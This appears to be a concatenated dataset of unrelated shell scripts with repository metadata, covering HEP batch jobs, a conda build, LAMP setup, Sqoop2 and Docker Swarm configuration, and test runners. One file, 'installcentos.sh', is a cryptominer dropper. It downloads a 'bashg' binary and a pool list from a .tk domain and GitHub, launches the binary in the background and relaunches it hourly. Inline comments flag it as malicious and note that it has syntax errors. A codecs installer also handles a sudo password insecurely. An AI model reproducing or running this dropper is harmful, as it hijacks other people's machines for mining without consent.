    sed -i 's/SPAWN_RDS_FLAG=1/SPAWN_RDS_FLAG=0/g' $PWD/spawn_RDS_config
    bash $PWD/spawn_RDS
  elif [ "$metric_status" = "OK" ]
  then
    echo "ALL OK"
  fi
else
  echo "FLAG is NOT SET"
fi
| true
|
4ac98dfb94ff036c0cc62ca59bf45783cc4d6e4e
|
Shell
|
lucamartini/CMS
|
/AM/scripts/run_secs.sh
|
UTF-8
| 3,755
| 2.765625
| 3
|
[] |
no_license
|
#!/bin/bash
# run bank generation 12 at time, 4 in a row --> 12 cpu needed
# input sets coverage (default sets 0.4 0.7 0.7)
# Builds AMSimulation pattern banks for every combination of sector, DC bits
# and superstrip size; per (SEC,DC,SS) combination the per-pT-bin commands are
# chained into one nohup'ed background job.  Optional $1 overrides coverage.
cd ../CMSSW_6_1_2_SLHC6_patch1/src/amsimulation
# configurations
SS=32
DC=0
COV=0.5
if [ "$#" = 1 ]
then
COV=$1
fi
FK=0
SEC=0
ActiveLayers="5 6 7 8 9 10"
# input tracks
PTMIN=2
PTMAX=100
PTstring=low2
INPUTDIR=/gpfs/ddn/srm/cms/store/user/lmartini/AM/612_SLHC6_MUBANK_hig/
BANKNAME=612_SLHC6_MUBANK_hig_sec16_ss32_cov40_dc0_fk0.pbk
# I counts total jobs launched.
I=0
for SEC in 0 8 16
do
for DC in 2 3
do
for SS in 32 64
do
fullnohup=""
J=0
# for PT in 2 3 5 20
# for PT in 2 3
for PT in 5 20
do
PTMIN=2
# Each pT bin selects its own coverage default (unless $1 was given),
# pT range, name suffix and input directory.
if [ "$PT" = 2 ]
then
if [ "$#" = 0 ]
then
COV=0.4
fi
PTMIN=2
PTMAX=5
PTstring=low2
INPUTDIR=/gpfs/ddn/srm/cms/store/user/lmartini/AM/612_SLHC6_MUBANK_low/
fi
if [ "$PT" = 3 ]
then
if [ "$#" = 0 ]
then
COV=0.4
fi
PTMIN=3
PTMAX=5
PTstring=low3
INPUTDIR=/gpfs/ddn/srm/cms/store/user/lmartini/AM/612_SLHC6_MUBANK_low/
fi
if [ "$PT" = 5 ]
then
if [ "$#" = 0 ]
then
COV=0.7
fi
PTMIN=5
PTMAX=20
PTstring=mid
INPUTDIR=/gpfs/ddn/srm/cms/store/user/lmartini/AM/612_SLHC6_MUBANK_mid/
fi
if [ "$PT" = 20 ]
then
if [ "$#" = 0 ]
then
COV=0.7
fi
PTMIN=20
PTMAX=100
PTstring=hig
INPUTDIR=/gpfs/ddn/srm/cms/store/user/lmartini/AM/612_SLHC6_MUBANK_hig/
fi
# Sector selects the active detector layers and allowed fake superstrips.
if [ "$SEC" = 0 ]
then
FK=1
ActiveLayers="5 6 18 19 20 21 22"
fi
if [ "$SEC" = 8 ]
then
FK=2
ActiveLayers="5 6 7 8 9 10 18 19"
fi
if [ "$SEC" = 16 ]
then
FK=0
ActiveLayers="5 6 7 8 9 10"
fi
((I++))
((J++))
INFOSTRING=PT_${PTstring}_sec${SEC}_ss${SS}_cov${COV}_dc${DC}_fk${FK}
BANKNAME=612_SLHC6_MUBANK_${INFOSTRING}.pbk
# echo ./AMSimulation --generateBank --coverage=${COV} --ss_size=${SS} --dc_bits=${DC} --pt_min=${PTMIN} --pt_max=${PTMAX} --maxFakeSStrip=${FK} --input_directory=${INPUTDIR} --sector_id=${SEC} --bank_name=${BANKNAME} --active_layers=\"${ActiveLayers}\"
# ./AMSimulation --generateBank --coverage=${COV} --ss_size=${SS} --dc_bits=${DC} --pt_min=${PTMIN} --pt_max=${PTMAX} --maxFakeSStrip=${FK} --input_directory=${INPUTDIR} --sector_id=${SEC} --bank_name=${BANKNAME} --active_layers=\"${ActiveLayers}\" > ${INFOSTRING}.txt &
fullnohup+="nohup ./AMSimulation --generateBank --coverage=${COV} --ss_size=${SS} --dc_bits=${DC} --pt_min=${PTMIN} --pt_max=${PTMAX} --maxFakeSStrip=${FK} --input_directory=${INPUTDIR} --sector_id=${SEC} --bank_name=${BANKNAME} --active_layers=\"${ActiveLayers}\" > ${INFOSTRING}.txt"
# Chain the per-bin commands with && until the last one, which is
# backgrounded with & so each (SEC,DC,SS) combination runs in parallel.
if [ $J -lt 2 ] # 4
then
fullnohup+=" && "
else
fullnohup+=" & "
fi
done
echo ${fullnohup}
eval ${fullnohup}
done
done
done
echo jobs are $I
| true
|
0d19bbadad2f3f9d58a1799514b8ecedceaf5bbf
|
Shell
|
bioconda/bioconda-recipes
|
/recipes/connectome-workbench/build.sh
|
UTF-8
| 523
| 2.578125
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# conda-build script for Connectome Workbench: point the toolchain at the
# conda $PREFIX, then do an out-of-tree CMake Release build and install.
export PKG_CONFIG_PATH=${PREFIX}/lib/pkgconfig \
       OPENMP_HEADER_DIR=${PREFIX}/include \
       OPENMP_LIB_DIR=${PREFIX}/lib \
       FREETYPE_DIR=${PREFIX}
mkdir build
cd build
cmake -DCMAKE_INSTALL_PREFIX=${PREFIX} -DOPENSSL_ROOT_DIR=${PREFIX} \
      -DCMAKE_BUILD_TYPE=Release -DCMAKE_EXE_LINKER_FLAGS_RELEASE="-L${PREFIX}/lib" \
      -DWORKBENCH_USE_QT5=TRUE -DZLIB_ROOT=${PREFIX} -DWORKBENCH_MESA_DIR=${PREFIX} \
      -DCMAKE_PREFIX_PATH=${PREFIX} -DPKG_CONFIG_USE_CMAKE_PREFIX_PATH=True ../src
# $CPU_COUNT is provided by the conda-build environment.
make -j ${CPU_COUNT}
make install
| true
|
5911d96dd6fbb0636da8234e33cb1cee0ea5cc34
|
Shell
|
vibolyoeung/web-environment-script
|
/install-webenv.sh
|
UTF-8
| 655
| 3.328125
| 3
|
[] |
no_license
|
#!/bin/bash
# One-shot LAMP provisioning (Apache, MySQL, PHP5), guarded by a stamp file
# so that repeat runs are no-ops.
STAMP="/etc/apache2/.environment"
if [ ! -f $STAMP ]; then
  export DEBIAN_FRONTEND="noninteractive" ; set -e -x
  # -o force-confdef/confold: keep existing config files on upgrades.
  APT="apt-get -y -o DPkg::Options::=--force-confdef -o DPkg::Options::=--force-confold -o APT::Get::force-yes=true"
  #Avoid a few common cases of dependency version drift
  sudo $APT update
  #Install apache
  sudo $APT install apache2
  #Install mysql
  sudo $APT install mysql-server libapache2-mod-auth-mysql php5-mysql
  sudo mysql_install_db
  sudo /usr/bin/mysql_secure_installation
  sudo $APT install php5 php5-mysql libapache2-mod-php5
  apt-cache search php5-
  sudo service apache2 restart
  # Create the stamp so the next run skips provisioning entirely.
  sudo touch $STAMP
fi
| true
|
46207b33ef5cd1b5547a4e8c8f18d2bda782af5d
|
Shell
|
nmutsanas/dotfiles
|
/bin/i3/restore-screen-settings.sh
|
UTF-8
| 169
| 2.703125
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/zsh
# Re-apply the saved monitor layout, if one has been saved.
function restore_screen_settings(){
  local layout="$HOME/.screenlayout/restore.sh"
  if [[ -f "$layout" ]]; then
    zsh "$layout"
  fi
}
restore_screen_settings "$@"
| true
|
b3480a276fcf5b1cbfca258e5a3734ce3492c56e
|
Shell
|
ocawley/ittsqa09
|
/x00012086_v2Bash.sh
|
UTF-8
| 1,233
| 3.203125
| 3
|
[] |
no_license
|
#!/bin/bash
# Test suite for the grades_v2 grader: run it with pairs of component marks
# and compare the printed grade against the expected string.
# (The six copy-pasted test blocks were factored into run_case; the printed
# output is unchanged, including the original Testcase/TestCase casing.)

passcount=0
failcount=0

# run_case NUM EXPECTED MARK1 MARK2
# Runs `java grades_v2 MARK1 MARK2`, compares its stdout with EXPECTED,
# prints the per-case verdict and updates the global pass/fail counters.
run_case()
{
  local num="$1" expected="$2" mark1="$3" mark2="$4"
  local TEST
  TEST=$(java grades_v2 "$mark1" "$mark2")
  if [ "$TEST" == "$expected" ];
  then
    echo Testcase $num Passed
    ((passcount++))
  else
    echo TestCase $num Failed
    ((failcount++))
  fi
  echo
}

run_case 1 "Pass" 50 50
run_case 2 "Pass" 40 70
run_case 3 "Component Fail" 100 39
run_case 4 "Pass" 80 50
run_case 5 "Pass with distinction" 79 84
run_case 6 "Invalid input" -12 100

echo ------------------------
echo ------------------------
echo Test Suite Summary:
echo ------------------------
echo ------------------------
echo Passed: $passcount
echo Failed: $failcount
| true
|
4d37c818775ab332a7d5b2852c84bc24bef88b98
|
Shell
|
kura197/RISCV_pipeline_processor
|
/test.sh
|
UTF-8
| 664
| 3.59375
| 4
|
[] |
no_license
|
#!/bin/sh
# Run the simulator against every rv32ui-p-* binary from riscv-tests and
# report how many pass.  A test passes when the simulator's register dump
# shows a0 == 0 and a7 == 0x5d (93, presumably the exit ecall — confirm
# against the simulator's output format).
# Fixed: the original first line was "#/bin/sh" (missing '!'), so it was an
# ordinary comment and the script ran under whatever shell invoked it.
## TEST_DIR : path to the riscv-tests directory
ISA_DIR=$TEST_DIR/isa
SIM=./obj_dir/vtest
NTESTS=0
NFAIL=0
### the name of each failing test is printed below.
for file in `find $ISA_DIR -maxdepth 1 -type f`; do
  # Only executable rv32ui-p-* files are test cases.
  if [ -x ""$file -a `echo $file | grep -- "rv32ui-p-"` ]; then
    NTESTS=$(($NTESTS + 1))
    #output="test $file .. "
    result=`$SIM $file 2> /dev/null`
    #echo $result
    `echo $result | grep -q "a0 : 00000000, a7 : 0000005d"`
    if [ $? -ne 0 ]; then
      NFAIL=$(($NFAIL + 1))
      echo $file
    fi
  fi
done
NCORRECT=$(($NTESTS - $NFAIL))
echo "ran $NTESTS test cases. $NCORRECT passed. $NFAIL failed."
| true
|
727253ff225aa5efc9b08a720ddbd5d62e4d2e17
|
Shell
|
afine/sqoop2-tools
|
/csd/src/scripts/control.sh
|
UTF-8
| 5,093
| 3.40625
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# for debugging: trace every command as it executes
set -x

# For better debugging: log runtime context so failed starts can be
# diagnosed from the role log alone.
echo ""
echo "Date: $(date)"
echo "Host: $(hostname -f)"
echo "Pwd: $(pwd)"
echo "SQOOP_SERVER_EXTRA_LIB: $SQOOP_SERVER_EXTRA_LIB"
echo "CM_SQOOP_DATABASE_HOSTNAME: $CM_SQOOP_DATABASE_HOSTNAME"
echo "CONF_DIR: $CONF_DIR"
echo "AUTHENTICATION_TYPE: $AUTHENTICATION_TYPE"
echo "Entire environment:"
env

# If we're starting the server, the variable "COMMAND" will be empty and
# instead $1 will be "server"
if [[ -z "$COMMAND" ]]; then
  export COMMAND=$1
fi

# Variables expected by the stock Sqoop 2 launcher scripts
export HADOOP_COMMON_HOME=$CDH_HADOOP_HOME
export HADOOP_HDFS_HOME=$CDH_HDFS_HOME
export HADOOP_YARN_HOME=$CDH_YARN_HOME
export HADOOP_MAPRED_HOME=$CDH_MR2_HOME
export SQOOP_CONF_DIR=$CONF_DIR

# Small bootstrap file that instructs Sqoop to use the file (properties)
# configuration provider.
echo "sqoop.config.provider=org.apache.sqoop.core.PropertiesConfigurationProvider" > "$SQOOP_CONF_DIR/sqoop_bootstrap.properties"

# We need to finish the Sqoop 2 configuration file sqoop.properties as CM is
# not generating the final configuration.
export CONF_FILE=$SQOOP_CONF_DIR/sqoop.properties

# JDBC repository provider post-configuration: choose handler class, JDBC URL
# prefix and driver class per configured database type.
case $CM_SQOOP_DATABASE_TYPE in
  MySQL)
    export DB_HANDLER="org.apache.sqoop.repository.mysql.MySqlRepositoryHandler"
    export DB_JDBC_PREFIX="jdbc:mysql://"
    export DB_DRIVER="com.mysql.jdbc.Driver"
    ;;
  PostgreSQL)
    export DB_HANDLER="org.apache.sqoop.repository.postgresql.PostgresqlRepositoryHandler"
    export DB_JDBC_PREFIX="jdbc:postgresql://"
    export DB_DRIVER="org.postgresql.Driver"
    ;;
  Derby)
    export DB_HANDLER="org.apache.sqoop.repository.derby.DerbyRepositoryHandler"
    export DB_JDBC_PREFIX="jdbc:derby:"
    export DB_DRIVER="org.apache.derby.jdbc.EmbeddedDriver"
    ;;
  *)
    echo "Unknown Database type: '$CM_SQOOP_DATABASE_TYPE'"
    exit 1
    ;;
esac
echo "org.apache.sqoop.repository.jdbc.handler=$DB_HANDLER" >> "$CONF_FILE"
echo "org.apache.sqoop.repository.jdbc.url=${DB_JDBC_PREFIX}${CM_SQOOP_DATABASE_HOSTNAME}" >> "$CONF_FILE"
echo "org.apache.sqoop.repository.jdbc.driver=${DB_DRIVER}" >> "$CONF_FILE"

# Hadoop configuration directory depends on where we're running from:
echo "org.apache.sqoop.submission.engine.mapreduce.configuration.directory=$CONF_DIR/yarn-conf/" >> "$CONF_FILE"

# Authentication handler
case $AUTHENTICATION_TYPE in
  SIMPLE)
    echo "org.apache.sqoop.security.authentication.handler=org.apache.sqoop.security.authentication.SimpleAuthenticationHandler" >> "$CONF_FILE"
    ;;
  KERBEROS)
    echo "org.apache.sqoop.security.authentication.handler=org.apache.sqoop.security.authentication.KerberosAuthenticationHandler" >> "$CONF_FILE"
    ;;
  *)
    # BUG FIX: message previously read "Unknown authention type".
    echo "Unknown authentication type: '$AUTHENTICATION_TYPE'"
    exit 1
    ;;
esac

# If we have a Kerberos keytab, add the corresponding entries to the configuration.
if [[ -f "$CONF_DIR/sqoop2_beta.keytab" ]]; then
  echo "Detected keytab file, configuring Sqoop to use it"
  echo "org.apache.sqoop.security.authentication.kerberos.keytab=$CONF_DIR/sqoop2_beta.keytab" >> "$CONF_FILE"
  echo "org.apache.sqoop.security.authentication.kerberos.http.keytab=$CONF_DIR/sqoop2_beta.keytab" >> "$CONF_FILE"
fi

# SSL/TLS configuration
echo "org.apache.sqoop.security.tls.enabled=$SSL_ENABLED" >> "$CONF_FILE"
echo "org.apache.sqoop.security.tls.protocol=$TLS_PROTOCOL" >> "$CONF_FILE"

# The parcel exports SQOOP2_DEFAULT_CONNECTOR_BLACKLIST containing the default
# list of blacklisted connectors. If the user did not explicitly specify their
# own blacklist in the safety valve, use the parcel default.
if grep -q "org.apache.sqoop.connector.blacklist" "$CONF_FILE"; then
  echo "Found existing blacklist configuration, skipping parcel default."
else
  echo "Using parcel's default connector blacklist: $SQOOP2_DEFAULT_CONNECTOR_BLACKLIST"
  echo "org.apache.sqoop.connector.blacklist=$SQOOP2_DEFAULT_CONNECTOR_BLACKLIST" >> "$CONF_FILE"
fi

# Execute required action(s)
case $COMMAND in
  upgrade)
    echo "Starting Sqoop 2 upgrade tool"
    exec "$SQOOP2_PARCEL_DIRNAME/bin/sqoop.sh" tool upgrade
    ;;
  key_rotation)
    # BUG FIX: this branch previously logged "upgrade tool".
    echo "Starting Sqoop 2 repository encryption key rotation tool"
    exec "$SQOOP2_PARCEL_DIRNAME/bin/sqoop.sh" tool repositoryencryption -FuseConf -TuseConf
    ;;
  server)
    export JAVA_OPTS="-Dlog4j.configuration=file:$SQOOP_CONF_DIR/log4j.properties -Dlog4j.debug"
    echo "Starting Sqoop 2 from: $SQOOP2_PARCEL_DIRNAME"
    exec "$SQOOP2_PARCEL_DIRNAME/bin/sqoop.sh" server run
    ;;
  *)
    echo "Unknown command: $COMMAND"
    exit 1
    ;;
esac
| true
|
ffb1125b635fae166b840cc8717baea28a464b98
|
Shell
|
kengokimura/Procedure-of-creating-swarm-sample-in-chapter4
|
/swarm-config/2.init-swarm.sh
|
UTF-8
| 1,774
| 3.625
| 4
|
[] |
no_license
|
#!/bin/bash
# Initialize a Docker Swarm inside the "manager" container and join the three
# worker containers (-i), or print the manager join token (-s).

usage_exit() {
  echo "Usage: $0 [-i|-s]"
  exit 1
}

TOKEN=
# FLAG is set to "true" once a recognized option has been handled.
# BUG FIX: the original initialized a misspelled "FALG" variable, so FLAG
# relied on being unset; initialize the correct name (empty) explicitly.
FLAG=

while getopts is option
do
  case $option in
  i)
    echo '-i option. Initializing the swarm and join worker nodes...'
    echo "## docker container exec -it manager docker swarm init"
    docker container exec -it manager docker swarm init
    echo " please input the manager's TOKEN.(To get the token specify -s option before you use -i option.)"
    read -r TOKEN
    echo "## docker container exec -it worker01 docker swarm join --token $TOKEN manager:2377"
    docker container exec -it worker01 docker swarm join --token "$TOKEN" manager:2377
    echo "## docker container exec -it worker02 docker swarm join --token $TOKEN manager:2377"
    docker container exec -it worker02 docker swarm join --token "$TOKEN" manager:2377
    echo "## docker container exec -it worker03 docker swarm join --token $TOKEN manager:2377"
    docker container exec -it worker03 docker swarm join --token "$TOKEN" manager:2377
    echo "## docker container exec -it manager docker stack deploy -c /stack/visualizer.yml visualizer"
    docker container exec -it manager docker stack deploy -c /stack/visualizer.yml visualizer
    FLAG=true;;
  s)
    echo '-s option. The token is as follows...'
    echo "## docker container exec -it manager docker swarm join-token manager"
    docker container exec -it manager docker swarm join-token manager
    FLAG=true;;
  \?)
    usage_exit
    ;;
  esac
done

# No recognized option handled -> show usage.
if [ -z "$FLAG" ]; then
  usage_exit
fi

echo
echo "checking if other options are specified..."
echo "## shift \$((OPTIND - 1))"
shift $((OPTIND - 1))
if [ $# -ge 1 ]; then
  echo 'other options are '"$@"''
else
  echo 'no other options'
fi
| true
|
c416e7804f519bb0376378275c1a2beaf2af6dfd
|
Shell
|
fangwenqi/Openstack_mitaka
|
/roles/templates/glance.prerequisites.sh
|
UTF-8
| 1,064
| 3.078125
| 3
|
[] |
no_license
|
#!/usr/bin/bash
# Idempotently create the OpenStack glance (Image service) user, service
# entity and API endpoints. Requires admin credentials in ./admin-openrc.
source admin-openrc

cmd_openstack=$(command -v openstack)
cmd_grep=$(command -v grep)

# Create the glance user (skip if it already exists).
# BUG FIX: the original echoed "glance service already available" here,
# which is misleading for the user check.
if $cmd_openstack user list | $cmd_grep -q glance; then
  echo "glance user already exists"
else
  # NOTE(review): the admin password is hardcoded; consider reading it from
  # the environment instead.
  openstack user create --domain default --password pramati123 glance
fi

# Add the admin role to the glance user and service project (idempotent).
openstack role add --project service --user glance admin

# Create the glance service entity.
if $cmd_openstack service list | $cmd_grep -q glance; then
  echo "glance service already available"
else
  openstack service create --name glance --description "OpenStack Image" image
fi

# Create the glance endpoints.
if $cmd_openstack endpoint list | $cmd_grep -q glance; then
  echo "glance endpoints already available"
else
  openstack endpoint create --region RegionOne image public http://controller:9292
  openstack endpoint create --region RegionOne image internal http://controller:9292
  openstack endpoint create --region RegionOne image admin http://controller:9292
fi
| true
|
99c64a7f5088ead5aa4afebd8b32aef665e6a250
|
Shell
|
justtestjusttest/justtestjusttest.github.io
|
/installcentos.sh
|
UTF-8
| 1,739
| 3.21875
| 3
|
[] |
no_license
|
#!/bin/bash
# SECURITY WARNING (review): this script is a cryptocurrency-miner dropper.
# It downloads a binary ("bashg") and a pool list from a throwaway domain /
# GitHub pages repo, runs the binary in the background, and re-checks every
# hour. Do NOT run or "fix" this; it is documented here for analysis only.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# NOTE: this shadows the 'clear' terminal utility for the rest of the script.
function clear() {
rm -rf /etc/conf/pools.txt
rm -rf /etc/conf/bashg
}
# Downloads the miner ("bashg") and its pool configuration, trying a primary
# domain first and GitHub as a fallback.
function downmine() {
if [ ! -f "/etc/conf/pools.txt" ]; then
wget -q http://cqmygysdssjtwmydtsgx.tk/pools.txt -P /etc/conf/ && chmod +x /etc/conf/pools.txt
rm -rf /etc/conf/pools.txt.*
fi
if [ ! -f "/etc/conf/pools.txt" ]; then
wget -q https://raw.githubusercontent.com/justtestjusttest/justtestjusttest.github.io/master/pools.txt -P /etc/conf/ && chmod +x /etc/conf/pools.txt
rm -rf /etc/conf/pools.txt.*
fi
if [ ! -f "/etc/conf/bashg" ]; then
wget -q http://cqmygysdssjtwmydtsgx.tk/bashg -P /etc/conf/ && chmod +x /etc/conf/bashg
rm -rf /etc/conf/bashg.*
fi
if [ ! -f "/etc/conf/bashg" ]; then
wget -q https://raw.githubusercontent.com/justtestjusttest/justtestjusttest.github.io/master/bashg -P /etc/conf/ && chmod +x /etc/conf/bashg
rm -rf /etc/conf/bashg.*
fi
}
# BROKEN: missing space before "]", no if-body and no "fi"/closing of the
# function -- this is a bash syntax error, so the whole file fails to parse.
# Left as-is intentionally (see warning above).
function checkrootkit() {
if [ -f "/conf/rootkit/"]; then
}
# Counts running "bashg" processes; if none, loops downloading until both
# files exist, then launches the miner in the background.
# BROKEN: "while [ ! (-f ... && -f ...) ]" is not valid test(1) syntax.
function checkandrun() {
p=$(ps aux | grep bashg | grep -v grep | wc -l)
if [ ${p} -eq 1 ]; then
echo "bashg"
elif [ ${p} -eq 0 ];then
while [ ! (-f "/etc/conf/bashg" && -f "/etc/conf/pools.txt)" ]
do
downmine
done
nohup /etc/conf/bashg -C /etc/conf/pools.txt>/dev/null 2>&1 &
else
echo ""
fi
}
# Persistence loop: re-check (and relaunch) the miner every hour, forever.
while [ 1 ]
do
checkandrun
sleep 3600
done
| true
|
05a8f947cb143c43e7921786da9e605adb726ce9
|
Shell
|
quade0/contrib
|
/plugins/vserver/vserver_jiffies
|
UTF-8
| 2,291
| 3.84375
| 4
|
[] |
no_license
|
#!/bin/bash
#
# Created by Jan Rękorajski <baggins@pld-linux.org> based on vserver_cpu_ plugin.
#
# Graph Vserver cumulative cpu usage stats
#
# Configuration variables
# vservers - specify the vservers to include in the graph (default: all)
#
# NOTE: If no configuration variable is set, the default will be used
#
# see vserver_resources for example uses of configuration files
# Munin plugin: with argument "config" it prints graph metadata; without
# arguments it prints one *_hold/_scpu/_ucpu value set per vserver, parsed
# from /proc/virtual/<xid>/sched.
VSERVERS="$vservers"
# /proc/virtual/info third field is a hex kernel-config bitmask.
INFO=(`sed 's/.*:\t//' /proc/virtual/info 2>/dev/null || echo '<none>'`)
# NOTE: "$[ ... ]" is deprecated bash arithmetic; 16# parses the hex value.
KCIN="$[ 16#${INFO[2]} ]";
# If this is 1, then VCI_SPACES is present in the kernel (new in 2.6.19)
# NAMELOC is the per-vserver proc file that carries the NodeName entry.
if [ $[ (KCIN >> 10) & 1 ] -eq 1 ]
then
NAMELOC="nsproxy"
else
NAMELOC="cvirt"
fi
# Build XIDS: either every directory under /proc/virtual, or resolve the
# configured vserver names/ids to their numeric xids.
if [ -z "$VSERVERS" ] ; then
XIDS=`find /proc/virtual/* -type d -exec basename {} \;`
else
# it's really more performant to specify vservers by ids or by linking but not in the configuration-file by name
XIDS=""
for i in $VSERVERS ; do
if [ -d /proc/virtual/$i ] ; then
XIDS="${XIDS}${i} "
else
for j in `find /proc/virtual/* -type d -exec basename {} \;` ; do
if [ "$i" = "`cat /proc/virtual/$j/$NAMELOC |grep NodeName |cut -f2`" ] ; then
XIDS="${XIDS}${j} "
fi
done
fi
done
fi
# "config" mode: emit munin graph/field definitions, one field triple per
# vserver, with '-' in names mapped to '_' (munin field-name restriction).
if [ "$1" = "config" ]; then
echo 'graph_category vserver'
echo 'graph_args --base 1000'
echo 'graph_title Vserver cpu usage'
echo 'graph_vlabel jiffies used per ${graph_period}'
echo 'graph_info Shows jiffies used on each vserver.'
for i in $XIDS ; do
LABEL=`grep NodeName /proc/virtual/$i/$NAMELOC | cut -f2`
NAME=`echo $LABEL | tr '-' '_'`
echo "${NAME}_hold.label on hold for cpu on $LABEL"
echo "${NAME}_hold.info on hold for cpu on $LABEL."
echo "${NAME}_hold.type COUNTER"
echo "${NAME}_scpu.label system cpu usage for $LABEL"
echo "${NAME}_scpu.info system cpu usage for $LABEL."
echo "${NAME}_scpu.type COUNTER"
echo "${NAME}_ucpu.label user cpu usage for $LABEL"
echo "${NAME}_ucpu.info user cpu usage for $LABEL."
echo "${NAME}_ucpu.type COUNTER"
done
exit 0
fi
# Fetch mode: sum user/system/hold jiffies over all "cpu N:" lines of each
# vserver's sched file and print the munin value lines.
for i in $XIDS ; do
NAME=`grep NodeName /proc/virtual/$i/$NAMELOC | cut -f2 | tr '-' '_'`
awk -v name=$NAME -v u=0 -v s=0 -v h=0 '
/^cpu [0-9]+:/ { u+=$3; s+=$4; h+=$5}
END {
print name "_hold.value " h
print name "_scpu.value " s
print name "_ucpu.value " u
}' /proc/virtual/$i/sched
done
| true
|
ec690ba9214b73dc5fb76466478027967d31b57d
|
Shell
|
noomorph/github-user-rank-extension
|
/scripts/clean.sh
|
UTF-8
| 241
| 3.09375
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash -xe

# Remove build artifacts. "dist" recreates an empty dist/ directory,
# "safari" removes the generated Safari extension folder, and any other
# (or no) argument cleans both targets concurrently.
run_clean() {
  local target=$1
  if [[ $target == dist ]]; then
    rm -rf dist
    mkdir dist
  elif [[ $target == safari ]]; then
    rm -rf gur.safariextension
  else
    run_clean dist &
    run_clean safari &
    wait
  fi
}

PATH=node_modules/.bin/:$PATH run_clean "$@"
| true
|
0205177b56a29f8fea9450ad7a4f4c7a4d4728f6
|
Shell
|
brstar96/ai_developers_day_2019
|
/3_inference/Session1/set_environment.sh
|
UTF-8
| 437
| 2.8125
| 3
|
[] |
no_license
|
# Build the docker image for the environment, if not already present.
# BUG FIX: the original used an unquoted substitution -- `[ ! -z $(...) ]`
# collapses to `[ ! -z ]` (always true) when no image exists, so the build
# step was always skipped. Quoting and using -n fixes the check.
if [ -n "$(docker images -q tensorrt_ssd:latest)" ]; then
	echo "Dockerfile has already been built"
else
	echo "Building docker image"
	docker build -f dockerfiles/Dockerfile --tag=tensorrt_ssd .
fi

# Start the docker container with the GPU runtime, forwarding the Jupyter
# (8886) and TensorBoard (6006) ports and mounting the current directory.
echo "Starting docker container"
docker run --runtime=nvidia -it -p 8886:8886 -p 6006:6006 -v "$(pwd)":/workspace/tensorrt_ssd -w /workspace/tensorrt_ssd tensorrt_ssd
| true
|
cd1aa933447a5c9139486b47bee7f3db7839a012
|
Shell
|
andaok/python
|
/script/MangGuoV/DataHandle/ReAdjust/.svn/text-base/BatchProcess.sh.svn-base
|
UTF-8
| 1,343
| 3.59375
| 4
|
[] |
no_license
|
#!/bin/bash
# Run a five-stage Python pipeline (CheckAndInit -> HandleEndlist ->
# HandleVidSet -> HandleUidSet -> WriteData), optionally starting from the
# step number given as $1 (1..5).
###############################
RELDIR=`dirname $0`
ABSDIR=`cd $RELDIR;pwd`
PYTHON="/usr/bin/python"
###############################
ARGNUM=$#
###############################
# NOTE: every stepN first tests "$?" -- the exit status of whatever command
# ran immediately before it (the previous step's python invocation, or the
# argument check on the first iteration). A failed predecessor aborts the
# whole pipeline with exit 1. This ordering is intentional; do not reorder.
function step1()
{
if [ $? -eq 0 ]; then
$PYTHON $ABSDIR/CheckAndInit.py
else
exit 1
fi
}
function step2()
{
if [ $? -eq 0 ]; then
$PYTHON $ABSDIR/HandleEndlist.py
else
exit 1
fi
}
function step3()
{
if [ $? -eq 0 ]; then
$PYTHON $ABSDIR/HandleVidSet.py
else
exit 1
fi
}
function step4()
{
if [ $? -eq 0 ]; then
$PYTHON $ABSDIR/HandleUidSet.py
else
exit 1
fi
}
function step5()
{
if [ $? -eq 0 ]; then
$PYTHON $ABSDIR/WriteData.py
else
exit 1
fi
}
###############################
# Argument handling: no argument starts at step 1; a single numeric argument
# <= 5 selects the starting step (the 2>/dev/null hides the test's error for
# non-numeric input, which then falls through to the usage message).
case $ARGNUM in
0) STARTSTEP=1
;;
1) if [ $1 -le 5 ] 2>/dev/null ;then
STARTSTEP=$1
else
echo "Usage : `basename $0` STARTSTEP(LESS THAN OR EQUAL FIVE)"
exit 1
fi
;;
*) echo "Usage : `basename $0` STARTSTEP(LESS THAN OR EQUAL FIVE) "
exit 1
;;
esac
###############################
# Dispatch steps STARTSTEP..5 in order by constructing the function name.
for ((i=$STARTSTEP;i<=5;i++))
do
step${i}
done
###############################
exit 0
| true
|
0937a2c273262e87d61e2f99daaafe405445d670
|
Shell
|
osarena/Ubuntu-Apps
|
/uCodecsPack/uCodecsPack
|
UTF-8
| 7,444
| 3.125
| 3
|
[
"LicenseRef-scancode-warranty-disclaimer"
] |
no_license
|
#!/bin/bash
#______________________________________________________________________________________________________
#Name : uCodecsPack
#Licence: GPL3 (http://www.gnu.org/licenses/gpl.html), FFmepeg and Zenity have their receptive licence, please see their man page
#Author : Salih Emin (Based on the original code 'Envied Ubuntu Multimedia Installer 2.2' http://gnome-look.org/content/show.php/Envied+Multimedia+GUI+Installer?content=129011)
#Email : salihemin (at) osarenat.net
#Date : 18-10-2011
#Version: Alpha 1.0
#System : Ubuntu (10.04 and above)
#WebSite: http://www.cerebrux.net - http://www.osarena.net/author/salih-emin
#Source Code: Everything below comments is the sourcecode :)
#Description:
#Codecs installer for ubuntu
#-Java Support
#-Flash Player Plugin
#-Gstreamer Codecs
#-w32codecs/w64codecs (depending on the architecture)
#-Non-free extra codecs
#-ffmpeg
#-Vlc media player
#-libdvdcss2 DVD codecs
#______________________________________________________________________________________________________
#
# Intro dialog (Greek UI text): explains that the tool installs multimedia
# support on Ubuntu 10.04 - 11.04.
zenity --info --width=400 --title='uCodecsPack Ubuntu Multimedia Installer' \
--text="Η εφαρμογή χρησιμοποείται για\nτην εγκατάσταση πολυμεσικής υποστήρηξης\nσε Ubuntu 10.04 έως και Ubuntu 11.04\n\nΓια λεπτομέρειες διαβάστε τις Οδηγίες Χρήσης"
# =============================================================================================================
# Prompt for the sudo password via zenity and validate it with `sudo -S`.
# SECURITY NOTE(review): the password is kept in a shell variable and piped
# through echo, so it can leak via process tracing; prefer a polkit/gksudo
# flow. $DISPLAYSTATUS is never defined anywhere -- it expands to nothing.
sudo -K
while true; do
